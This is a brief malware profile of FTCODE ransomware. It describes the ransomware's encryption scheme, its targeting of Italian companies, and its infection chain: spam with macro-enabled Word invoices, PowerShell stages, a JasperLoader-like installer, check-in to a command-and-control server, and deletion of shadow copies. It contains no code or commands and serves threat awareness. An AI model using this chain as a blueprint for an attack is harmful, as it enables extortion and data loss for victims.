FTCODE Ransomware encrypts user data using AES-256 (in CBC mode) + RSA-1024, and then requires a ransom of $500 to return the files. FTCODE ransomware mainly target Italian companies. It is spreading via email spam campaign which previously know to distribute JasperLoader and Gootkit. It spread using an invoice-themed email that appears as a target for Italian users, attackers attempt to convince users to allow macros in a Word document.
The macro is used to run PowerShell to retrieve additional PowerShell code. This second PowerShell code, then, executes a GET request to a remote URL to obtain a Visual Basic file, which is similar to JasperLoader. Using JasperLoader as an installer, FTCODE starts preparing the environment by running checks to make sure the host is not already infected, generating a GUID and creating a unique password for the host. Some system information along with the GUID and password are sent to the attacker command and control server via a POST request. It also performs common ransomware functions, such as deleting backups and shadow copies. Finally, the files corresponding to a list of applicable extensions are encrypted. A ransom note is left on the system to provide payment instructions for file recovery.